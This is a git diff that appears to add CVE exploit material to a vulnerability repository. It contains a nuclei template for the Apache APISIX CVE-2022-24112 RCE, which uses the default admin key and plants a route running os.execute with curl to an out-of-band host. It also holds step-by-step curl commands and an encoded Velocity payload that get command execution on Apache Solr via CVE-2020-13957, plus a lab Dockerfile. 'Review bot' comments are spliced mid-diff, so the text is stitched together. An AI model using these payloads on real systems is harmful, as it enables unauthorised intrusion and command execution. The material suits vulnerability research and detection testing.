diff --git a/cve/apache-APISIX/CVE-2022-24112/.keep b/cve/apache-APISIX/CVE-2022-24112/.keep new file mode 100644 index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 diff --git a/cve/apache-APISIX/CVE-2022-24112.py b/cve/apache-APISIX/CVE-2022-24112/CVE-2022-24112.py similarity index 100% rename from cve/apache-APISIX/CVE-2022-24112.py rename to cve/apache-APISIX/CVE-2022-24112/CVE-2022-24112.py diff --git a/cve/apache-APISIX/yaml/.keep b/cve/apache-APISIX/yaml/.keep new file mode 100644 index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 diff --git a/cve/apache-APISIX/yaml/CVE-2022-24112.yaml b/cve/apache-APISIX/yaml/CVE-2022-24112.yaml new file mode 100644 index 0000000000000000000000000000000000000000..a2d9ab835a9ce70677939c9be199d5a2759cae9d --- /dev/null +++ b/cve/apache-APISIX/yaml/CVE-2022-24112.yaml 
@@ -0,0 +1,54 @@
+id: CVE-2022-24112
+
+info:
+ name: Apache APISIX apisix/batch-requests RCE
+ description: Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE;An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.
+ author: Mr-xn
+ severity: critical
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-24112
+ - https://www.openwall.com/lists/oss-security/2022/02/11/3
+ - https://twitter.com/sirifu4k1/status/1496043663704858625
+ - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests
+
+ tags: cve,cve2022,apache,rce,apisix
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2022-24112
+ cwe-id: CWE-290
+
+requests:
+ - raw:
+ - |
+ POST /apisix/batch-requests HTTP/1.1
+ Host: {{Host}}:9080
+ Content-Type: application/json
+ Accept-Encoding: gzip, deflate
+ Accept-Language: zh-CN,zh;q=0.9
+ Connection: close
+
+ {"headers":{"X-Real-IP":"127.0.0.1","Content-Type":"application/json"},"timeout":1500,"pipeline":[{"method":"PUT","path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1","body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/test\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl {{randstr}}.{{interactsh-url}}'); return true end\"}"}]}
+ - |
+ GET /api/test HTTP/1.1
+ Host: {{Host}}:9080
+ Accept-Encoding: gzip, deflate
+ Accept-Language: zh-CN,zh;q=0.9
+ Connection: close
+
+ redirects: false
+
+ matchers-condition: and
+ req-condition: true
+ matchers:
+ - type: dsl
+ dsl:
+ - "status_code_1 == 200"
+ # - "status_code_2 == 404"
+ - 'contains(body_1, "{{randstr}}")'
+ # - 'contains(body_1, "\"status\":200,\"reason\":\"OK\"}")'
+ condition: and
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
diff --git a/cve/apache-APISIX/yaml/LICENSE b/cve/apache-APISIX/yaml/LICENSE new file mode 100644
index 0000000000000000000000000000000000000000..261eeb9e9f8b2b4b0d119366dda99c6fd7d35c64
--- /dev/null
+++ b/cve/apache-APISIX/yaml/LICENSE
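Review bot: The detection leaves a persistent backdoor on every host it matches: the pipeline's PUT to `/apisix/admin/routes/index` installs a route whose `filter_func` calls `os.execute` on each GET to `/api/test`, and nothing in the template removes it, so a scan converts each vulnerable gateway into an unauthenticated command-execution endpoint reachable by anyone who finds the path. Appending a cleanup step to the batch, `{"method":"DELETE","path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1"}`, sent after the trigger GET with the same spoofed `X-Real-IP`, or at least a comment warning operators that the route must be deleted by hand, would bound the damage. The hard-coded key is the stock `admin_key`, so the matchers only fire on installs that never rotated it; the IP-restriction bypass described in `description` still affects rotated installs, and the template should state that a non-match is not evidence the host is patched. `Host: {{Host}}:9080` pins the data-plane port, whereas nuclei's `{{Hostname}}` would preserve the port the target was actually scanned on. Finally, `contains(body_1, "{{randstr}}")` most likely only shows that the admin API echoed the stored route definition (which contains the randstr) back through the batch response, so the interactsh matcher is the one that actually confirms execution and the DSL condition should not be read as an independent RCE signal.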
@@ -0,0 +1,201 @@ + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. 
For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. 
Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of 
the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. 
Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. 
+ + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. diff --git a/cve/apache-APISIX/yaml/README.md b/cve/apache-APISIX/yaml/README.md new file mode 100644 index 0000000000000000000000000000000000000000..db0a56453d2449229124b69a80846ba60e8b9f4b --- /dev/null +++ b/cve/apache-APISIX/yaml/README.md 
@@ -0,0 +1,22 @@
+# CVE-2022-24112
+CVE-2022-24112:Apache APISIX apisix/batch-requests RCE
+
+nuclei template :[CVE-2022-24112.yaml](./CVE-2022-24112.yaml)
+
+shotpic_2022-02-22_23-36-38
+
+这个漏洞本质利用和 [CVE-2021-45232](https://xz.aliyun.com/t/10738) 类似,都是绕过授权或未授权,来执行恶意的 route 里的 filter_func 或者 script 来执行命令
+
+## 注意是事项
+
+- `X-Real-IP` 的值可以是 `127.0.0.1`,`localhost` 或者 `2130706433`
+- `pipeline` 是必须项,以下为其 body 部分的值说明
+- `method` 固定为 `PUT`
+- `uri` 必须存在,这也是 exp 后需要访问来触发的 URL
+- `plugins`,`upstream/upstream_id`,`service_id` 这三个必须存在其中一个,详情可以参考官方文档
+
+如果 service_id 不可用 可以替换成 `\"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}`
+
+参考:
+- https://twitter.com/sirifu4k1/status/1496043663704858625
+- https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests
diff --git a/cve/apache/CVE-2020-13957/.keep b/cve/apache/CVE-2020-13957/.keep new file mode 100644
index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391
diff --git a/cve/apache/CVE-2020-13957/Dockerfile b/cve/apache/CVE-2020-13957/Dockerfile new file mode 100644
index 0000000000000000000000000000000000000000..06a8d2084700dbd0b1788d3b51bb34ac8d41e921
--- /dev/null
+++ b/cve/apache/CVE-2020-13957/Dockerfile
@@ -0,0 +1,14 @@
+FROM openjdk:11.0.9.1-jre-buster
+
+RUN apt update && apt install -y lsof
+
+ARG SOLR_VER=8.2.0
+ENV PATH $PATH:/usr/local/src/solr-${SOLR_VER}/bin
+
+WORKDIR /usr/local/src
+RUN curl -OL https://archive.apache.org/dist/lucene/solr/${SOLR_VER}/solr-${SOLR_VER}.tgz
+RUN tar -xzvf solr-${SOLR_VER}.tgz
+
+RUN apt update && apt install -y procps
+
+WORKDIR /usr/local/src/solr-${SOLR_VER}/bin
diff --git a/cve/apache/CVE-2020-13957/README.md b/cve/apache/CVE-2020-13957/README.md new file mode 100644
index 0000000000000000000000000000000000000000..a691def72f6bfbea8b4328034214a4562b843791
--- /dev/null
+++ b/cve/apache/CVE-2020-13957/README.md
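Review bot: The Solr tarball fetched by `RUN curl -OL https://archive.apache.org/dist/lucene/solr/${SOLR_VER}/solr-${SOLR_VER}.tgz` is extracted and put on `PATH` without any integrity check, so the lab image trusts whatever the mirror happens to serve; even for an intentionally vulnerable test bed the download should be pinned, e.g. fetch the `.sha512` file Apache publishes next to the tarball and run `sha512sum -c solr-${SOLR_VER}.tgz.sha512` before the `tar` step. The two `apt update && apt install` layers (`lsof`, then `procps`) can be merged into a single `RUN ... && rm -rf /var/lib/apt/lists/*`, which avoids re-fetching the package index in the second layer and keeps the image smaller. Nothing here drops privileges, so Solr later runs as root inside the container (the README's `uid=0(root)` output reflects this and is presumably why `-force` is needed); a `USER` directive for an unprivileged account would keep a compromised PoC process from owning the whole container filesystem.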
@@ -0,0 +1,119 @@
+# Apache Solr RCE CVE-2020-13957
+
+**Docker Demo**
+
+![docker-demo](https://user-images.githubusercontent.com/56715563/100495824-8cabfd00-3192-11eb-9874-960e3c0839fb.gif)
+
+**Mac Demo**
+
+![mac-demo](https://user-images.githubusercontent.com/56715563/100495858-d3015c00-3192-11eb-8813-46f94fa4f9c4.gif)
+
+## NVD CVE-2020-13957 Description
+
+NVD [CVE-2020-13957](https://nvd.nist.gov/vuln/detail/CVE-2020-13957)
+
+```
+Apache Solr versions 6.6.0 to 6.6.6, 7.0.0 to 7.7.3 and 8.0.0 to 8.6.2 prevents some features considered dangerous (which could be used for remote code execution) to be configured in a ConfigSet that's uploaded via API without authentication/authorization. The checks in place to prevent such features can be circumvented by using a combination of UPLOAD/CREATE actions.
+```
+
+## Docker
+
+### Set up PoC environment
+
+**1. Build an image from a Dockerfile**
+
+```
+$ docker build -t cve-2020-13957 .
+```
+
+**2. Run /bin/bash in a new container**
+
+```
+$ docker run --rm -p 8983:8983 --name cve-2020-13957 -it cve-2020-13957 /bin/bash
+```
+
+**3. Start Apache Solr Cloud in the container**
+
+```
+$ ./solr start -e cloud -noprompt -force
+```
+
+### Exploit
+
+**1. Upload a ConfigSet**
+
+Apache Solr Guide [Upload a ConfigSet](https://lucene.apache.org/solr/guide/8_2/configsets-api.html#configsets-api)
+
+```
+$ curl -X POST --header "Content-Type:application/octet-stream" --data-binary @myconfigset.zip "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=myConfigSet"
+```
+
+**2. Create a Collection**
+
+Apache Solr Guide [Create a Collection](https://lucene.apache.org/solr/guide/8_2/collection-management.html#create)
+
+```
+$ curl "http://localhost:8983/solr/admin/collections?action=CREATE&name=newCollection&numShards=2&replicationFactor=1&wt=xml&collection.configName=myConfigSet"
+```
+
+**3. Exec Id Command**
+
+```
+$ curl "http://localhost:8983/solr/newCollection/select?q=1&wt=velocity&v.template=custom&v.template.custom=%23set(%24x%3d%27%27)+%23set(%24rt%3d%24x.class.forName(%27java.lang.Runtime%27))+%23set(%24chr%3d%24x.class.forName(%27java.lang.Character%27))+%23set(%24str%3d%24x.class.forName(%27java.lang.String%27))+%23set(%24ex%3d%24rt.getRuntime().exec(%27id%27))+%24ex.waitFor()+%23set(%24out%3d%24ex.getInputStream())+%23foreach(%24i+in+%5b1..%24out.available()%5d)%24str.valueOf(%24chr.toChars(%24out.read()))%23end"
+```
+
+**Output**
+
+```
+ 0 uid=0(root) gid=0(root) groups=0(root)
+```
+
+## Mac
+
+### Set up PoC environment
+
+**1. Download Apache Solr**
+
+```
+$ curl -OL https://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.tgz
+```
+
+**2. Unzip**
+
+```
+$ tar -xzvf solr-8.2.0.tgz
+```
+
+**3. Start Apache Solr Cloud**
+
+```
+$ solr-8.2.0/bin/solr start -e cloud -noprompt -force
+```
+
+### Exploit
+
+**1. Upload a ConfigSet**
+
+Apache Solr Guide [Upload a ConfigSet](https://lucene.apache.org/solr/guide/8_2/configsets-api.html#configsets-api)
+
+```
+$ curl -X POST --header "Content-Type:application/octet-stream" --data-binary @myconfigset.zip "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=myConfigSet"
+```
+
+**2. Create a Collection**
+
+Apache Solr Guide [Create a Collection](https://lucene.apache.org/solr/guide/8_2/collection-management.html#create)
+
+```
+$ curl "http://localhost:8983/solr/admin/collections?action=CREATE&name=newCollection&numShards=2&replicationFactor=1&wt=xml&collection.configName=myConfigSet"
+```
+
+**3. Open Calc**
+
+```
+$ curl "http://localhost:8983/solr/newCollection/select?q=1&wt=velocity&v.template=custom&v.template.custom=%23set(%24x%3d%27%27)+%23set(%24rt%3d%24x.class.forName(%27java.lang.Runtime%27))+%23set(%24chr%3d%24x.class.forName(%27java.lang.Character%27))+%23set(%24str%3d%24x.class.forName(%27java.lang.String%27))+%23set(%24ex%3d%24rt.getRuntime().exec(%27open+-a+calculator%27))+%24ex.waitFor()+%23set(%24out%3d%24ex.getInputStream())+%23foreach(%24i+in+%5b1..%24out.available()%5d)%24str.valueOf(%24chr.toChars(%24out.read()))%23end"
+```
+
+## References
+
+- https://github.com/Imanfeng/Apache-Solr-RCE#cve-2020-13957
diff --git a/cve/apache/CVE-2020-13957/myconfigset.zip b/cve/apache/CVE-2020-13957/myconfigset.zip new file mode 100644
index 0000000000000000000000000000000000000000..ae8c7301a188fb00f7c48f8ebc8f85c3cfd809fc
Binary files /dev/null and b/cve/apache/CVE-2020-13957/myconfigset.zip differ